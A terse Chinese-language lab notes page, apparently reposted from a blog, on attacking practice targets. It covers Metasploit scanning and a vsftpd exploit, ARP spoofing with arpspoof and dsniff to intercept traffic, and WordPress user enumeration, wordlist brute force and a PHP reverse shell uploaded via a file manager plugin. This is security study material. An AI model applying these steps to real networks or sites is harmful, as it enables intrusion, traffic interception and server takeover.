信息收集 auxiliary scanners
使用metasploitable靶机 桥接 同一局域网
msfconsole nmap -sT 靶机IP nmap -sS 靶机IP 隐身扫描 search ssh_version use 辅助模块地址 options set RHOSTS 靶机ip set THREADS 100 runmetasploit 基本exp利用
zenmap 扫描 msfconsole 从第一个服务端口开始 search vsftpd use exploit模块 options set 都设置好 run 或者 exploit uname -a lsARP欺骗 中毒 中间人 MITM 这些术语都是一个意思
双终端同步 wifi 用 wth0 arpspoof -i eth0 -t 蓝队IP 网关IP //告诉别人,我是网关 arpspoof -i eth0 -t 网关IP 蓝队IP //告诉网关,我是别人 dsniff //捕获流量 wireshark大鲨鱼分析流量包下载wordpress靶机:https://www.turnkeylinux.org/wordpresshttps://blog.csdn.net/CliffordR/article/details/86632754
192.168.1.108/wp-admin/ wpscan 扫描 wpscan --help wpscan -u 靶机IP -e u vp wpscan -u 靶机IP -e u --wordlist /root/wordlist.txt 登录 插件-添加-文件管理器 file manager 下载reverse shell php 修改里面的IP和端口 上传到404 168.168.1.108/404转载于:https://www.cnblogs.com/sec875/p/11354328.html
相关资源:mad-metasploit:Metasploit自定义模块,插件,资源脚本和很棒的metasploit集合-源码